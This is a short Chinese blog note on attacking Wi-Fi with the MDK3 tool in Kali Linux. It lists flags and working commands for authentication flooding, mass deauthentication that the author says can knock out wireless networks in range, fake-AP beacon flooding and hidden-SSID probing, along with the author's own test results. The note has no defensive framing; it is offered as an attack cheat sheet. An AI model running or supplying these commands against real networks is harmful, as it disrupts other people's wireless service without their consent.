kali系统下的MDK3攻击

1身份验证攻击
    mdk3 mon0 a
          -a #测试指定BSSID
          -m #使用有效数据库中的客户端mac地址
          -c #对应 -a ,不检查是否测试成功
          -i #对指定BSSID进行智能攻击
          -s #速率,默认50
#测试似乎没有什么效果 mdk3 wlan0mon a -a 8C:A6:DF:37:13:2C -s 20
2伪造断开连接
在这个模式下,软件会向周围所有可见AP不断发出“断开连接”的包……可以造成一定范围内的无线网络瘫痪(当然有白名单,黑名单模式),直到手动停止攻击!

    mdk3 mon0 d
          -w              #白名单mac地址列表文件
          -b               #黑名单mac地址列表文件
          -s                         #速率,这个模式下默认无限制
          -c [chan,chan,chan,…]                  #信道,可以多填,如 2,4,5,1
#测试效果良好 应该有针对对应AP的方法 我找找 dk3 wlan0mon d -c 1
#后加--bssid MAC
#mdk3 --help d

3伪造AP
产生大量死亡SSID来充斥无线客户端的无线列表,扰乱用户;还可以自定义发送死亡SSID的BSSID和ESSID、加密方式(如wep/wpa2)等。感觉鸡肋

    mdk3 mon0 b
          -n         #自定义ESSID
          -f             #读取ESSID列表文件
          -v            #自定义ESSID和BSSID对应列表文件
          -d       #自定义为Ad-Hoc模式
          -w         #自定义为wep模式
         -g        #54Mbit模式
         -t   # WPA TKIP encryption
         -a #WPA AES encryption
          -m #读取数据库的mac地址
          -c #自定义信道
          -s #发包速率
    mdk3 –help b #查看详细内容
#mdk3 wlan0mon b -f /root/桌面/WIFI.txt
#伪造成功!

4探测AP信息和ESSID猜测
    mdk3 mon0 p
          -e           #待检测的ssid
          -f           #检测AP设置为隐藏的ssid列表文件
          -t                #用bssid检测AP的信息
          -s                 #速率,默认300
          -b               #设置字符集
#并不知道有什么实际价值 后面遇见说吧

你可能感兴趣的:(wi-fi,Kali)